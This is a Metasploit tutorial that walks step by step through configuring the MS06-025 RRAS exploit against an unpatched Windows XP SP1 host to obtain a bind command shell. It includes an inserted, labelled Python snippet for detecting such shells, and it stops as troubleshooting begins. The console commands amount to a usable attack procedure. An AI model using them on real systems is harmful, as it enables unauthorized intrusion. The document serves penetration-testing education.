
Using the Metasploit Console to Launch Exploits: Victim unpatched XP SP 1


In this walkthrough we exploit an unpatched XP Service Pack 1 machine that is missing the RRAS security update (MS06-025). We’ll try to get a remote command shell running on that box using the RRAS exploit built into the Metasploit Framework.

Metasploit can pair any Windows exploit with any Windows payload. So we can choose to use the RRAS vulnerability to open a command shell, create an administrator, start a remote VNC session, or to do a bunch of other stuff. Let’s get started.

$ ./msfconsole

[msfconsole ASCII-art banner]

       =[ msf v3.0
+ -- --=[ 177 exploits - 104 payloads
+ -- --=[ 17 encoders - 5 nops
       =[ 30 aux

msf >


The interesting commands to start with are:

show <exploits | payloads>
info <exploit | payload> <name>
use <exploit-name>

Other commands can be found by typing help. Our first task will be to find the name of the RRAS exploit so we can use it:

msf > show exploits

Exploits
========

   Name                              Description
   ----                              -----------
   ...
   windows/smb/ms04_011_lsass        Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow
   windows/smb/ms04_031_netdde       Microsoft NetDDE Service Overflow
   windows/smb/ms05_039_pnp          Microsoft Plug and Play Service Overflow
   windows/smb/ms06_025_rasmans_reg  Microsoft RRAS Service RASMAN Registry Overflow
   windows/smb/ms06_025_rras         Microsoft RRAS Service Overflow
   windows/smb/ms06_040_netapi       Microsoft Server Service NetpwPathCanonicalize Overflow


There it is! Metasploit calls it windows/smb/ms06_025_rras. We’ll use that exploit and then go looking for all the options needed to make the exploit work.

msf > use windows/smb/ms06_025_rras
msf exploit(ms06_025_rras) >

Notice that the prompt changes to enter “exploit mode” when you use an exploit module. Any options or variables you set while configuring this exploit will be retained so you don’t have to reset the options every time you run it. You can get back to the original launch state at the main console by issuing the back command.

msf exploit(ms06_025_rras) > back
msf > use windows/smb/ms06_025_rras
msf exploit(ms06_025_rras) >

Different exploits have different options. Let’s see what options need to be set to make the RRAS exploit work.

msf exploit(ms06_025_rras) > show options

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  ROUTER           yes       The pipe name to use (ROUTER, SRVSVC)

This exploit requires a target address, the port number SMB (server message block) uses to listen, and the name of the pipe exposing this functionality.

msf exploit(ms06_025_rras) > set RHOST 192.168.1.220
RHOST => 192.168.1.220

As you can see, the syntax to set an option is set <OPTION-NAME> <value>.

Metasploit is often particular about the case of the option name and its value, so it is best to use uppercase if the option is listed in uppercase. With the exploit module set, we next need to set the payload and the target type. The payload is the action that happens after the vulnerability is exploited; it’s like choosing what you want to happen as a result of exploiting the vulnerability. For this first example, let’s use a payload that simply opens a command shell listening on a TCP port.

msf exploit(ms06_025_rras) > show payloads

Compatible payloads
===================

   ...
   windows/shell_bind_tcp       Windows Command Shell, Bind TCP Inline
   windows/shell_bind_tcp_xpfw  Windows Disable Windows ICF, Command Shell, Bind TCP Inline
   windows/shell_reverse_tcp    Windows Command Shell, Reverse TCP Inline
   ...

Here we see three payloads, each of which can be used to load an inline command shell. The word “inline” here means the command shell is set up in one round trip. The alternative is a “staged” payload, which fits into a smaller buffer but requires an additional network round trip to set up. Because of the nature of some vulnerabilities, buffer space in the exploit is at a premium and a staged payload is the better option.

This XP SP1 machine is not running a firewall, so we’ll choose a simple bind shell and accept the default options.

msf exploit(ms06_025_rras) > set PAYLOAD windows/shell_bind_tcp
PAYLOAD => windows/shell_bind_tcp
msf exploit(ms06_025_rras) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.1.220    yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  ROUTER           yes       The pipe name to use (ROUTER, SRVSVC)

Payload options:

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LPORT     4444             yes       The local port
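As an added defender-side example (not part of the original page), the following Python flags what a bind-shell payload like windows/shell_bind_tcp leaves behind on the victim: the shell runs inside the exploited svchost.exe and listens on LPORT (4444 by default), so an svchost listener on a port it normally does not serve is a cheap host-level indicator. The netstat/tasklist sample lines and the set of expected svchost ports are constructed assumptions for this example.

```python
import re

# Ports svchost.exe is expected to listen on (assumption for this example).
EXPECTED_SVCHOST_PORTS = {135, 445, 3389}

# Constructed sample in the shape of `netstat -ano` TCP lines.
NETSTAT_SAMPLE = """\
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       904
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:4444           0.0.0.0:0              LISTENING       1052
  TCP    192.168.1.220:139      0.0.0.0:0              LISTENING       4
"""

# Constructed sample in the shape of `tasklist` output (image name, PID, ...).
TASKLIST_SAMPLE = """\
System                         4 Console   0      236 K
svchost.exe                  904 Console   0    4,812 K
svchost.exe                 1052 Console   0    6,204 K
"""

_NETSTAT_RE = re.compile(r"^\s*TCP\s+\S+:(\d+)\s+\S+\s+LISTENING\s+(\d+)\s*$")
_TASKLIST_RE = re.compile(r"^(\S+)\s+(\d+)\s")

def parse_listeners(netstat_text):
    """Return (port, pid) for every TCP socket in LISTENING state."""
    out = []
    for line in netstat_text.splitlines():
        m = _NETSTAT_RE.match(line)
        if m:
            out.append((int(m.group(1)), int(m.group(2))))
    return out

def parse_processes(tasklist_text):
    """Return {pid: image name (lowercased)} from tasklist-style lines."""
    procs = {}
    for line in tasklist_text.splitlines():
        m = _TASKLIST_RE.match(line)
        if m:
            procs[int(m.group(2))] = m.group(1).lower()
    return procs

def suspicious_svchost_listeners(netstat_text, tasklist_text,
                                 expected=EXPECTED_SVCHOST_PORTS):
    """Return (pid, port) for svchost.exe listeners outside the expected port set."""
    procs = parse_processes(tasklist_text)
    # A bind shell in a hijacked svchost shows up as a listener on LPORT (4444 here).
    return [(pid, port) for port, pid in parse_listeners(netstat_text)
            if procs.get(pid) == "svchost.exe" and port not in expected]
```

On the constructed sample this reports svchost.exe PID 1052 listening on 4444; the System process (PID 4) on 445 and 139 is ignored because it is not svchost.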

The exploit and payload are both set. Next we need to set a target type. Metasploit has some generic exploits that work on all platforms, but for others you’ll need to specify a target operating system.

msf exploit(ms06_025_rras) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows 2000 SP4
   1   Windows XP SP1

msf exploit(ms06_025_rras) > set TARGET 1
TARGET => 1

All set! Let’s kick off the exploit.

msf exploit(ms06_025_rras) > exploit
[*] Started bind handler
[-] Exploit failed: Login Failed: The SMB server did not reply to our request

Hmm… Windows XP SP1 should not require authentication for this exploit. The Microsoft security bulletin lists XP SP1 as anonymously attackable. Let’s take a closer look at this exploit.

msf exploit(ms06_025_rras) > info

       Name: Microsoft RRAS Service Overflow
    Version: 4498
   Platform: Windows
 Privileged: Yes
    License: Metasploit Framework License

Provided by:
  Nicolas Pouvesle <nicolas.pouvesle@gmail.com>
  hdm <hdm@metasploit.com>

Available targets:
   Id  Name
   --  ----
   0   Windows 2000 SP4
   1   Windows XP SP1

Basic options:
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.1.220    yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  ROUTER           yes       The pipe name to use (ROUTER, SRVSVC)

Payload information:
   Space: 1104
   Avoid: 1 characters

Description:
This module exploits a stack overflow in the Windows Routing and Remote Access Service. Since the service is hosted inside svchost.exe, a failed exploit attempt can cause other system services to fail as well. A valid username and password is required to exploit this flaw on Windows 2000. When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.

The exploit description claims that to attack XP SP1, the SMBPIPE option needs to be set to SRVSVC. You can see from our preceding options display that the SMBPIPE is set to ROUTER. Before blindly following instructions, let’s explore which pipes are accessible on this XP SP1 target machine and see why ROUTER didn’t work. Metasploit version 3 added several auxiliary modules, one of which is a named pipe enumeration tool. We’ll use that to see if this ROUTER named pipe is exposed remotely.
